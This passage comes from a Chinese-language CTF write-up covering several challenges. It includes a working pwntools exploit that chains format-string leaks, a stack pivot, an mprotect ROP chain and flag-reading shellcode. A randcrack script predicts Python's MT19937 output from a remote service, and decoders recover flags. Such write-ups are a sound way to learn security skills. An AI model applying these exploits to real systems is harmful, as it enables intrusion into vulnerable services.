) & chr( 279444/4234 ) & chr( 5693-5572 ) & chr( 7627-7511 ) & chr( 9114-9013 ) & chr( 128864/4027 ) & chr( 465247/7627 ) & chr( -1215+1247 ) & chr( 9956-9841 ) & chr( -6215+6255 ) & chr( 26080/652 ) & chr( -5167+5282 ) & chr( 296520/7413 ) & chr( -5640+5745 ) & chr( -8069+8110 ) & chr( -740+772 ) & chr( 92235/2145 ) & chr( 6267-6235 ) & chr( -3504+3619 ) & chr( 11240/281 ) & chr( 753448/7108 ) & chr( -5324+5365 ) & chr( -5911+5952 ) & chr( -2746+2778 ) & chr( -2953+3030 ) & chr( 1074702/9682 ) & chr( -3942+4042 ) & chr( 8672-8640 ) & chr( 3343-3293 ) & chr( -9590+9643 ) & chr( -1920+1974 ) & chr( 190568/4648 ) & chr( -8907+8939 ) & chr( 4693-4605 ) & chr( 4103-3992 ) & chr( 1024974/8991 ) & chr( 117216/3663 ) & chr( -7725+7837 ) & chr( 1025460/9495 ) & chr( 6361-6264 ) & chr( 925995/8819 ) & chr( 166210/1511 ) & chr( 8106-8039 ) & chr( 256672/2468 ) & chr( 8511-8414 ) & chr( -1592+1706 ) & chr( 4349-4336 ) & chr( 20-10 ) & chr( 131648/4114 ) & chr( 3440-3408 ) & chr( 3286-3254 ) & chr( 86528/2704 ) & chr( -209+241 ) & chr( 176256/5508 ) & chr( -4786+4818 ) & chr( 24576/768 ) & chr( 973581/8771 ) & chr( -5686+5803 ) & chr( 1068012/9207 ) & chr( 419760/5830 ) & chr( 438138/4338 ) & chr( 6119-5999 ) & chr( 56320/1760 ) & chr( -5861+5922 ) & chr( -9201+9233 ) & chr( 6816-6705 ) & chr( 8085-7968 ) & chr( -365+481 ) & chr( 604944/8402 ) & chr( 246238/2438 ) & chr( -8362+8482 ) & chr( 171296/5353 ) & chr( -4409+4447 ) & chr( 6653-6621 ) & chr( 336856/4108 ) & chr( -7684+7789 ) & chr( 2731-2628 ) & chr( 6687-6583 ) & chr( 93496/806 ) & chr( 1485-1445 ) & chr( 5893-5859 ) & chr( 410832/8559 ) & chr( -4662+4696 ) & chr( 44352/1386 ) & chr( -9673+9711 ) & chr( 86144/2692 ) & chr( 507744/7052 ) & chr( 9182-9081 ) & chr( 7532-7412 ) & chr( 8068-8028 ) & chr( 921096/9304 ) & chr( 7511-7406 ) & chr( 542752/4846 ) & chr( 7625-7521 ) & chr( 811939/8039 ) & chr( -5529+5643 ) & chr( 366498/5553 ) & chr( 366993/3033 ) & chr( 116/1 ) & chr( -4380+4481 ) & chr( 234889/5729 ) & chr( 374-330 ) & chr( 7121-7089 ) & chr( -964+1014 ) & chr( -9185+9226 ) & chr( 53105/4085 ) & chr( 1368-1358 ) & chr( 3776-3744 ) & chr( 81760/2555 ) & chr( 2908-2876 ) & chr( 672/21 ) & chr( 591084/7578 ) & chr( -9777+9878 ) & chr( 4310-4190 ) & chr( -329+445 ) & chr( 8841-8828 ) & chr( 80190/8019 ) & chr( 9449-9417 ) & chr( 5188-5156 ) & chr( 6912/216 ) & chr( 46496/1453 ) & chr( 8868-8855 ) & chr( -6823+6833 ) & chr( -5834+5866 ) & chr( 7348-7316 ) & chr( 214720/6710 ) & chr( -3281+3313 ) & chr( -6230+6312 ) & chr( -281+398 ) & chr( -5980+6090 ) & chr( 2673-2591 ) & chr( 233897/3491 ) & chr( -8111+8143 ) & chr( -3952+4013 ) & chr( 7846-7814 ) & chr( 5859-5748 ) & chr( 661752/5656 ) & chr( 742632/6402 ) & chr( 2362-2290 ) & chr( 286234/2834 ) & chr( 814-694 ) & chr( 40105/3085 ) & chr( 4489-4479 ) & chr( -838+907 ) & chr( -8563+8673 ) & chr( -2698+2798 ) & chr( -2969+3001 ) & chr( 7600-7530 ) & chr( 896805/7665 ) & chr( -8073+8183 ) & chr( 1727-1628 ) & chr( -6557+6673 ) & chr( 3501-3396 ) & chr( 87357/787 ) & chr( 4403-4293 ) & chr( 3724-3711 ) & chr( 4260-4250 ) & chr( -6051+6064 ) & chr( -71+81 ) & chr( 466-427 ) & chr( 6300-6268 ) & chr( -15360+8376 ) & chr( -1.435792E+08/8237 ) & chr( -21866-10 ) & chr( -4.86175E+07/8145 ) & chr( -1.932544E+08/5987 ) & chr( 3287-3159 ) & chr( -19485+2053 ) & chr( -10516-6235 ) & chr( 78936/6072 ) & chr( -9394+9404 ) & chr( 551807/7559 ) & chr( 973692/9546 ) & chr( 310720/9710 ) & chr( 507832/6682 ) & chr( 4001-3934 ) & chr( -4647+4744 ) & chr( -6770+6885 ) & chr( 491163/4863 ) & chr( 10032-9992 ) & chr( -1066+1148 ) & chr( 174330/1490 ) & chr( 986700/8970 ) & chr( 78064/952 ) & chr( -5671+5738 ) & chr( -6282+6322 ) & chr( 4287-4185 ) & chr( 3549-3441 ) & chr( 790162/8146 ) & chr( 8188-8085 ) & chr( -800+844 ) & chr( 522-490 ) & chr( -5550+5663 ) & chr( 284291/2389 ) & chr( -9338+9440 ) & chr( -6438+6539 ) & chr( 8277-8236 ) & chr( -8711+8752 ) & chr( -5591+5623 ) & chr( 148291/2431 ) & chr( -3434+3466 ) & chr( 425372/5597 ) & chr( -5132+5199 ) & chr( -322+419 ) & chr( 185380/1612 ) & chr( 5352-5251 ) & chr( 365160/9129 ) & chr( 9277-9158 ) & chr( -489+590 ) & chr( 913002/8951 ) & chr( -8433+8531 ) & chr( 8830-8713 ) & chr( 1089-970 ) & chr( 192990/1838 ) & chr( -9564+9681 ) & chr( -5453+5554 ) & chr( 40221/981 ) & chr( -7928+7960 ) & chr( 756672/9008 ) & chr( 785824/7556 ) & chr( 1607-1506 ) & chr( -5161+5271 ) & chr( -8087+8100 ) & chr( 90010/9001 ) & chr( 34688/1084 ) & chr( 20224/632 ) & chr( 8731-8699 ) & chr( 178496/5578 ) & chr( -837+914 ) & chr( -4694+4809 ) & chr( -7603+7706 ) & chr( 619212/9382 ) & chr( 1092906/9846 ) & chr( 7594-7474 ) & chr( 69632/2176 ) & chr( 133042/3913 ) & chr( 9457-9390 ) & chr( 2319-2208 ) & chr( 475200/4320 ) & chr( -8977+9080 ) & chr( -8597+8711 ) & chr( 1592-1495 ) & chr( 754812/6507 ) & chr( -6078+6195 ) & chr( -9522+9630 ) & chr( 1824-1727 ) & chr( -6145+6261 ) & chr( 312690/2978 ) & chr( -1513+1624 ) & chr( 902220/8202 ) & chr( 1378-1263 ) & chr( -8522+8555 ) & chr( -6796+6828 ) & chr( -57+124 ) & chr( -4239+4350 ) & chr( 964212/8458 ) & chr( 573534/5031 ) & chr( 565903/5603 ) & chr( -8417+8516 ) & chr( 1116732/9627 ) & chr( -8648+8680 ) & chr( -6586+6656 ) & chr( -1832+1908 ) & chr( -5339+5404 ) & chr( 559267/7877 ) & chr( 138765/4205 ) & chr( 2868-2834 ) & chr( 556-543 ) & chr( 53810/5381 ) & chr( 212589/3081 ) & chr( -4647+4755 ) & chr( 712885/6199 ) & chr( -1506+1607 ) & chr( 91234/7018 ) & chr( 1299-1289 ) & chr( -4904+4936 ) & chr( 9659-9627 ) & chr( 117024/3657 ) & chr( 38720/1210 ) & chr( 440748/5724 ) & chr( 19320/168 ) & chr( -9444+9547 ) & chr( -3384+3450 ) & chr( 9050-8939 ) & chr( -6493+6613 ) & chr( -5110+5142 ) & chr( -2061+2095 ) & chr( 1450-1363 ) & chr( 111+3 ) & chr( 9913-9802 ) & chr( 152680/1388 ) & chr( -1082+1185 ) & chr( 4066-4034 ) & chr( 6896-6794 ) & chr( 838-730 ) & chr( -2902+2999 ) & chr( 5974/58 ) & chr( -8244+8290 ) & chr( -9640+9674 ) & chr( 36491/2807 ) & chr( -2075+2085 ) & chr( -301+370 ) & chr( -2824+2934 ) & chr( -2915+3015 ) & chr( 1811-1779 ) & chr( -7946+8019 ) & chr( -5275+5377 ) & chr( -7424+7437 ) & chr( 34620/3462 ) & vbcrlf )
'''
# 提取所有chr(...)中的表达式
expressions = re.findall(r'chr\( (.*?) \)', input_str)
flag = ''
for expr in expressions:
expr = expr.replace('E+', 'e+').replace('E-', 'e-') # 处理科学计数法
try:
value = eval(expr)
value = int(round(value))
value = value % 256 # 处理负数溢出
flag += chr(value)
except:
continue # 忽略错误
print(flag)
或者参考这篇博客
解题过程:下载是个vbs文件,txt可以查看,参照博客记一次VBS逆向 - 漫宿骄盛 - 博客园。把开头改成wscript.echo,就能输出源代码。
逆向解出flag:
def rc4_decrypt(ciphertext_hex, key):
# 将16进制密文转为字节
ciphertext = bytes.fromhex(ciphertext_hex)
# RC4 初始化
S = list(range(256))
j = 0
key_bytes = key.encode()
# KSA (Key Scheduling Algorithm)
for i in range(256):
j = (j + S[i] + key_bytes[i % len(key_bytes)]) % 256
S[i], S[j] = S[j], S[i]
# PRGA (Pseudo-Random Generation Algorithm)
i = j = 0
plaintext = []
for byte in ciphertext:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
k = S[(S[i] + S[j]) % 256]
plaintext.append(byte ^ k)
return bytes(plaintext).decode('latin-1')
# 给定的密文和密钥
ciphertext_hex = "90df4407ee093d309098d85a42be57a2979f1e51463a31e8d15e2fac4e84ea0df622a55c4ddfb535ef3e51e8b2528b826d5347e165912e99118333151273cc3fa8b2b3b413cf2bdb1e8c9c52865efc095a8dd89b3b3cfbb200bbadbf4a6cd4"
key = "rc4key"
# 解密
flag = rc4_decrypt(ciphertext_hex, key)
print("Flag:", flag)
PWN
girlfriend
分析
这里存在格式化字符串漏洞
__int64 sub_1708()
{
if ( dword_4098 <= 1 )
{
++dword_4098;
puts("You should tell her your name first");
read(0, byte_4060, 0x100uLL);
puts("your name:");
printf(byte_4060);
puts("You also get her name: XM");
puts("Good luck!");
}
else
{
puts("You can only introduce yourself twice.");
}
return 0LL;
}
这里存在栈溢出漏洞,能溢出8个字节,刚好能覆盖返回地址,这里使用栈迁移来打。
__int64 sub_15C9()
{
char buf[56]; // [rsp+0h] [rbp-40h] BYREF
unsigned __int64 v2; // [rsp+38h] [rbp-8h]
v2 = __readfsqword(0x28u);
if ( dword_4094 )
{
puts("You have already tried to talk to her, and she left...");
}
else
{
dword_4094 = 1;
puts("Girl is very beautiful!");
puts("what do you want to say to her?");
read(0, buf, 0x50uLL);
printf("You say: %s\n", buf);
puts("but she left.........");
}
return 0LL;
}
注意使用mprotect来设置可执行段时要保证页对齐,也就是:data或者bss要以0x000结尾才行
include <unistd.h>
include <sys/mmap.h>
int mprotect(const void *start, size_t len, int prot); //start处的地址要以0x000结尾,port要为7
EXP:
from pwn import *
from LibcSearcher import *
# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./girlfriend"
# io = remote("139.155.126.78",24681)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc6_2.35-0ubuntu3.8_amd64.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
local_gadget = [0x4525a,0xef9f4,0xf0897]
def girl(data):
sla(b"Your Choice:",b"1")
# gdb.attach(io)
ru(b"what do you want to say to her?")
s(data)
def buy():
sla(b"Your Choice:",b"2")
sla(b"Y/N",b"Y")
def replay(data):
sla(b"Your Choice:",b"3")
ru(b"You should tell her your name first")
s(data)
def sing(data):
sla(b"Your Choice:",b"4")
ru(b"(G)give up...")
s(data)
def pwn():
replay(b"%7$p%17$p%15$p%6$p"+b"\x00"*0x80)
ru(b"0x")
main_addr = int(r(12),16)-0x18d9
print("main_addr-------------->: ",hex(main_addr))
ru(b"0x")
libc_start_main = int(r(12),16)+0x30
libc_base = libc_start_main-libc.sym['__libc_start_main']
print("libc_base-------------------->:",hex(libc_base))
ru(b"0x")
canary = int(r(16),16)
print("canary---------------------->: ",hex(canary))
ru(b"0x")
stack_addr = int(r(12),16)
print("stack_addr--------------------->: ",hex(stack_addr))
mprotect_addr = libc_base+libc.sym["mprotect"]
pop_rdi = libc_base+0x000000000002a3e5
pop_rdx_r12 = libc_base+0x000000000011f2e7
pop_rsi = libc_base+0x000000000002be51
leave_addr = main_addr+0x1676
read_addr = main_addr+elf.plt['read']
payload = p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(main_addr+0x4060-0x60)+p64(pop_rdx_r12)+p64(0x100)+p64(0)+p64(read_addr)
payload += p64(pop_rdi)+p64(main_addr+0x4060-0x60)
payload += p64(pop_rsi)+p64(0x1000)
payload +=p64(pop_rdx_r12)+p64(7)+p64(0)+p64(mprotect_addr)
payload += p64(main_addr+0x4060-0x60)
replay(payload)
payload = b"a"*8+p64(pop_rdi)+p64(main_addr+0x4060)
payload += p64(pop_rsi)+p64(0x1000)
payload += p64(pop_rdx_r12)+p64(0x7)+p64(canary)
payload += p64(main_addr+0x4058)+p64(leave_addr)
girl(payload)
sh = shellcraft.openat(-100,"/flag",0)
sh += shellcraft.sendfile(1,3,0,0x50)
sh = asm(sh)
sl(sh)
itr()
if __name__ == "__main__":
# while True:
# io = process(pwnfile)
io = remote("8.147.132.32",36002)
try:
pwn()
except:
io.close()
MISC
XGCTF
提示:2024年CTFshow举办了一场名为“西瓜杯”的比赛(XGCTF)。其中LamentXU在出题的时候,从某场比赛拉了道原题下来改了改,结果传文件的时候传错了传成原题了。因为这件事LamentXU的损友dragonkeep在他之前的博客上的原题wp上加了一段flag来嘲笑LamentXU。请你找到XGCTF中唯一由LamentXU出的题,并找出这题对应的原题,接着找到dragonkeep师傅的博客,并从博客上讲解该题的博文中找到flag。(hint:dragonkeep师傅因为比较穷买不起域名,因此他博客的域名在dragonkeep的基础上多了个字母)
登录ctfshow官网,找到西瓜杯的官方wp
找到出题人出的题,名为 easy_polluted
然后在必应中搜索easy_polluted的其它wp,在先知社区中的一篇wp中知道是ciscn的原题。
然后直接在必应搜索dragonkeep
点开找到
然后点进去,右键查看源码
然后base64解码得flag
flag{1t_I3_t3E_s@Me_ChAl1eNge_aT_a1L_P1e@se_fOrg1ve_Me}
签个到吧
最小的,具有图灵完备性的语言是brainfuck,
deepseek分析的:
在某个单元累加数值后,通过循环将其转移到前一个单元,随后立即清零,导致所有操作无效。由于代码中缺乏输出指令(.)且所有单元最终被清零,因此无法生成任何有效输出。
给出一个brainfuck转python的代码:
def shrinkBFCode(code):
cPos2Vars = {} #位置对应的变量
cPos2Change = {} #位置中 + 号 增加的值
varPos = 0
nCode = []
incVal = 0
lc = None
dataChangeOp = set(['+', '-'])
dataShiftOp = set(['>', '<'])
for i in range(len(code)):
c = code[i]
if c not in dataChangeOp and lc in dataChangeOp:
cPos2Change[len(nCode)] = incVal
cPos2Vars[len(nCode)] = varPos
nCode.append('+')
incVal = 0
if c == '>':
varPos += 1
elif c == '<':
varPos -= 1
else:
if c in dataChangeOp:
incVal += 1 if c == '+' else -1
else:
#if lc == '>' or lc == '<':
# cPos2Vars[len(nCode)] = varPos
cPos2Vars[len(nCode)] = varPos
nCode.append(c)
lc = c
return ''.join(nCode), cPos2Vars, cPos2Change
def generatePyCode(shellCode, pVars, pChange):
pyCodes = []
bStacks = []
whileVarCache = {}
for i, c in enumerate(shellCode):
d_pos = i if i not in pVars else pVars[i]
d_change = 1 if i not in pChange else pChange[i]
indentLevel = len(bStacks)
indentStr = ' '*(4*indentLevel)
if c == '[':
pyCodes.append('{}while data[{}] != 0:'.format(indentStr, d_pos))
bStacks.append((c, i))
whileVarCache[i] = {}
elif c == ']':
if bStacks[-1][0] != '[':
raise Exception('miss match of {}] found between {} and {}'.format(bStacks[-1][0], bStacks[-1][1], i))
cNum = i-bStacks[-1][1]
if cNum == 2:
del pyCodes[-1]
del pyCodes[-1]
d_pos_l = i-1 if i-1 not in pVars else pVars[i-1]
pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
whileCode = shellCode[bStacks[-1][1]+1 : i]
if cNum>2 and '[' not in whileCode and not '%' in whileCode: # nested loop is a bit complicated, just skip
loopCondvar = bStacks[-1][1]
d_pos_l = loopCondvar if loopCondvar not in pVars else pVars[loopCondvar]
whileVars = whileVarCache[bStacks[-1][1]]
cVarChange = whileVars[d_pos_l]
# remove statement of same indent
while len(pyCodes)>0 and pyCodes[-1].startswith(indentStr) and pyCodes[-1][len(indentStr)]!=' ':
pyCodes.pop()
pyCodes.pop()
#del pyCodes[bStacks[-1][1]-i:]
for vPos, vChange in whileVars.items():
if vPos == d_pos_l:
continue
ctimes = abs(vChange / cVarChange)
ctimesStr = '' if ctimes==1 else '{}*'.format(ctimes)
cSign = '+' if vChange > 0 else '-'
pyCodes.append('{}data[{}] {}= {}data[{}]'.format(' '*(4*(indentLevel-1)),
vPos, cSign, ctimesStr, d_pos_l))
pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
del whileVarCache[bStacks[-1][1]]
bStacks.pop()
elif c == '.':
pyCodes.append('{}print(data[{}])'.format(indentStr, d_pos))
elif c == ',':
pyCodes.append('{}data[{}] = ord(stdin.read(1))'.format(indentStr, d_pos))
elif c == '+':
opSign = '-=' if d_change < 0 else '+='
if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, d_change)
else:
pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
if bStacks:
whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
whileVarCache[bStacks[-1][1]][d_pos] += d_change
elif c == '-':
opSign = '+=' if d_change < 0 else '-='
if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, -d_change)
else:
pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
if bStacks:
whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
whileVarCache[bStacks[-1][1]][d_pos] -= d_change
elif c == '%':
pyCodes.append('{}data[{}] %= data[{}]'.format(indentStr, d_pos, d_pos+1))
return '\n'.join(pyCodes)
target='>+++++++++++++++++[<++++++>-+-+-+-]<[-]>++++++++++++[<+++++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++[<+++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++[<+++>-+-+-+-]<[-]>+++++++++++++++++[<+++>-+-+-+-]<[-]>++++++++++++[<+++++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>++++++++[<++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++[<++++>-+-+-+-]<[-]>++++++++[<++++++>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++[<++++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>++++++++++++[<+++++++>-+-+-+-]<[-]>++++++++++[<+++++++>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>++++++++++[<+++++>-+-+-+-]<[-]>++++++++[<++++++>-+-+-+-]<[-]>++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++++++++++++++[<+++>-+-+-+-]<[-]>+++++++++++[<++++++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++[<++>-+-+-+-]<[-]>++++++++[<++++++>-+-+-+-]<[-]>+++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>+++++++[<+++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++[<++++>-+-+-+-]<[-]>+++++++++++[<+++>-+-+-+-]<[-]>+++++++++++++++++++++++++[<+++++>-+-+-+-]<[-]'
shrinkCode, pVars, pChange = shrinkBFCode(target)
print(generatePyCode(shrinkCode, pVars, pChange))
运行后的结果是:
D:\python3.12\ctf\venv\Scripts\python.exe D:/python3.12/ctf/pwn/one.py
data[1] += 17
data[0] += 6.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 12
data[0] += 9.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 97
data[0] += data[1]
data[1] = 0
data[0] = 0
data[1] += 103
data[0] += data[1]
data[1] = 0
data[0] = 0
data[1] += 41
data[0] += 3.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 29
data[0] += 3.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 17
data[0] += 3.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 12
data[0] += 9.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 67
data[0] += data[1]
data[1] = 0
data[0] = 0
data[1] += 8
data[0] += 6.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 109
data[0] += data[1]
data[1] = 0
data[0] = 0
data[1] += 101
data[0] += data[1]
data[1] = 0
data[0] = 0
data[1] += 19
data[0] += 5.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 29
data[0] += 4.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 8
data[0] += 6.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 19
data[0] += 5.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 11
data[0] += 8.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 89
data[0] += data[1]
data[1] = 0
data[0] = 0
data[1] += 67
data[0] += data[1]
data[1] = 0
data[0] = 0
data[1] += 12
data[0] += 7.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 10
data[0] += 7.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 19
data[0] += 5.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 10
data[0] += 5.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 8
data[0] += 6.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 10
data[0] += 5.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 53
data[0] += data[1]
data[1] = 0
data[0] = 0
data[1] += 19
data[0] += 5.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 23
data[0] += 3.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 11
data[0] += 10.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 53
data[0] += 2.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 8
data[0] += 6.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 11
data[0] += 5.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 19
data[0] += 5.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 7
data[0] += 7.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 29
data[0] += 4.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 11
data[0] += 3.0*data[1]
data[1] = 0
data[0] = 0
data[1] += 25
data[0] += 5.0*data[1]
data[1] = 0
data[0] = 0
进程已结束,退出代码 0
然后叫deepseek把上面data[1]和data[0]以ascii码输出,也交给deepseek
每四个一组,给出每组前两个的结果的ascii码
将每组前 2 行的 data[0] 值转换为 ASCII 字符:
复制
f l a g { W 3 l C 0 m e _ t 0 _ X Y C T F _ 2 0 2 5 _ E n j 0 7 _ 1 t ! }
拼接结果:
flag{W3lC0me_t0_XYCTF_2025_Enj07_1t!}
CRY
Division
这道题目涉及利用 Python random 模块的伪随机数生成器(Mersenne Twister, MT19937)的可预测性来获取 flag。关键点在于:
伪随机数的可预测性:
Python 的 random 模块使用 MT19937 算法,该算法在给定足够多的输出样本(624 个 32 位整数)后,可以逆向计算出其内部状态,从而预测后续生成的随机数。
题目中,选项 1 提供了 random.getrandbits(32) 的输出,我们可以收集这些值来重建随机数生成器的状态。
关键分析:
选项 2 要求输入 rand1 // rand2 的正确值,其中:
rand1 = random.getrandbits(11000)
rand2 = random.getrandbits(10000)
由于 random 模块的状态可以被预测,我们可以先收集足够的样本(624 个 32 位随机数),然后预测 rand1 和 rand2 的值,从而计算出 rand1 // rand2 并提交正确答案。
解题步骤总结
收集随机数样本(624 个 32 位整数):
选择选项 1 并输入分母 1,使得程序返回 random.getrandbits(32) // 1(即直接暴露 random.getrandbits(32) 的值)。
收集 624 个这样的值,用于重建 random 模块的内部状态。
重建随机数生成器状态:
使用 randcrack 库(或其他 MT19937 逆向工具)提交收集到的随机数样本,重建内部状态。
预测 rand1 和 rand2:
利用重建的状态,预测后续的随机数:
rand1 = rc.predict_getrandbits(11000)
rand2 = rc.predict_getrandbits(10000)
计算 rand1 // rand2 并提交:
计算 correct_ans = rand1 // rand2。
选择选项 2 并提交 correct_ans,获取 flag。
EXP
from pwn import *
from randcrack import RandCrack
def collect_samples(conn, num_samples=624):
rc = RandCrack()
for _ in range(num_samples):
conn.sendlineafter(b': >>> ', b'1')
conn.sendlineafter(b'input the denominator: >>> ', b'1')
line = conn.recvline().decode().strip()
# 提取结果中的分子值,例如:12345//1 = 12345
print(f"已收集 {_ + 1}/624 个样本")
numerator = int(line.split('=')[1].strip())
rc.submit(numerator)
return rc
def main():
conn = remote('47.94.15.198', 22534) # 替换为实际的服务器地址和端口
rc = collect_samples(conn)
# 预测rand1和rand2
rand1 = rc.predict_getrandbits(11000)
rand2 = rc.predict_getrandbits(10000)
correct_ans = rand1 // rand2
# 提交答案
conn.sendlineafter(b': >>> ', b'2')
conn.sendlineafter(b'input the answer: >>> ', str(correct_ans).encode())
# 获取flag
conn.interactive()
if __name__ == '__main__':
main()
扫一扫
1324
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
